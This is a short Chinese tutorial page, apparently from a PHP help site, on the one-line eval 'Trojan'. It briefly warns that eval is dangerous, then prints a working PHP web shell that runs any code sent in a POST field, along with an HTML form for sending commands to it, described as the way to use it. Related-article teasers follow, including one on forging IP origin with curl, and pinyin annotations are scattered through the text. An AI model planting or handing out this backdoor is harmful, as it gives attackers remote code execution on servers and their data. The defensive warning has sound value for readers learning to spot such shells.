php eval函數(shù)一句話木馬代碼
eval可以用來執(zhí)行任何其他php代碼,所以對于代碼里發(fā)現(xiàn)了eval函數(shù)一定要小心,可能是木馬
就這一句話害死人,這樣任何人都可以post任何文件上來,所以要做好防范
<?php @eval($_POST['c']);?>
使用方法也很簡單,本地提交文件指向提交文件,里面的php代碼就會(huì)被執(zhí)行
<html> <body> <form action="a.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </body> </html>
以上所述就是本文的全部內(nèi)容了,希望大家能夠喜歡。
相關(guān)文章
php實(shí)現(xiàn)四舍五入的方法小結(jié)
這篇文章主要介紹了php實(shí)現(xiàn)四舍五入的方法,實(shí)例總結(jié)了php實(shí)現(xiàn)四舍五入的三種常用方法,具有一定參考借鑒價(jià)值,需要的朋友可以參考下2015-03-03解決了Ajax、MySQL 和 Zend Framework 的亂碼問題
功夫不負(fù)有心人,花了將近一天時(shí)間,終于解決了Ajax 、MySQL 和 Zend Framework 的亂碼問題?,F(xiàn)在總結(jié)如下,以供參考。2009-03-03php采用curl實(shí)現(xiàn)偽造IP來源的方法
這篇文章主要介紹了php采用curl實(shí)現(xiàn)偽造IP來源的方法,主要涉及使用curl的CURLOPT_REFERER參數(shù)實(shí)現(xiàn)該功能,需要的朋友可以參考下2014-11-11php自定義函數(shù)實(shí)現(xiàn)JS的escape的方法示例
這篇文章主要介紹了php自定義函數(shù)實(shí)現(xiàn)JS的escape的方法,結(jié)合完整實(shí)例形式分析了php實(shí)現(xiàn)JS的escape功能函數(shù)的相關(guān)技巧,具有一定參考借鑒價(jià)值,需要的朋友可以參考下2016-07-07